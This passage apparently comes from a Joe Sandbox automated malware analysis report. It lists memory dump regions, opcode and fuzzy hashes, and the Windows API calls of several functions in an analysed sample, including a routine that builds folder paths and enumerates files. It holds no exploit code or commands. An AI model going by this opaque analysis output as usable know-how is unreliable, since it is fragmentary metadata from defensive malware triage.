                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 4fa365345c519b41e9a32d15893273d87561420d8a75cf53ff4e5a690e5ab984
                                • Instruction ID: da0d5b44ee633cbf8cffad01040d67c50dc3b670ffe6109656544c9f5c5ae8e7
                                • Opcode Fuzzy Hash: 4fa365345c519b41e9a32d15893273d87561420d8a75cf53ff4e5a690e5ab984
                                • Instruction Fuzzy Hash: 98F03775E4020CFBDF10DFB4DD5AF9EB7B9AB48720F108258BA51A72C4D670AA019B60
                                Function 00D9C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00D9C74E
                                  • Part of subcall function 00D9BF9F: __amsg_exit.LIBCMT ref: 00D9BFAF
                                • __getptd.LIBCMT ref: 00D9C765
                                • __amsg_exit.LIBCMT ref: 00D9C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00D9C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: a34b9b714686bdd41bcc5e074eeb04c9583d152bb8bc3bc2e64ea9e2bdf55ed7
                                • Instruction ID: b8bd0a2c035b757eb4767598088705e377da1cf5dc35ce3311fa95c9dcc410db
                                • Opcode Fuzzy Hash: a34b9b714686bdd41bcc5e074eeb04c9583d152bb8bc3bc2e64ea9e2bdf55ed7
                                • Instruction Fuzzy Hash: FAF09A32E107009BDF20BFF8A946B5A33A0EF00731F25524AF404A62D2DB7459419EB6
                                Function 00D94F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94F7A
                                • lstrcat.KERNEL32(?,00DA1070), ref: 00D94F97
                                • lstrcat.KERNEL32(?,01829168), ref: 00D94FAB
                                • lstrcat.KERNEL32(?,00DA1074), ref: 00D94FBD
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D9492C
                                  • Part of subcall function 00D94910: FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                  • Part of subcall function 00D94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                  • Part of subcall function 00D94910: FindClose.KERNEL32(000000FF), ref: 00D94B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 74fb9b603ec8fa7f470e13cea57d6fdf91becf8a118677f3316009954efc53c0
                                • Instruction ID: a2572b19c47a3694cdd6e3b37c52b6c73febd08909bd0ed14238e4a04d448b09
                                • Opcode Fuzzy Hash: 74fb9b603ec8fa7f470e13cea57d6fdf91becf8a118677f3316009954efc53c0
                                • Instruction Fuzzy Hash: BF21887A90020C6BCB54F7B0ED47EE9333CEB55704F004558B65993181EE75A6CD9BB2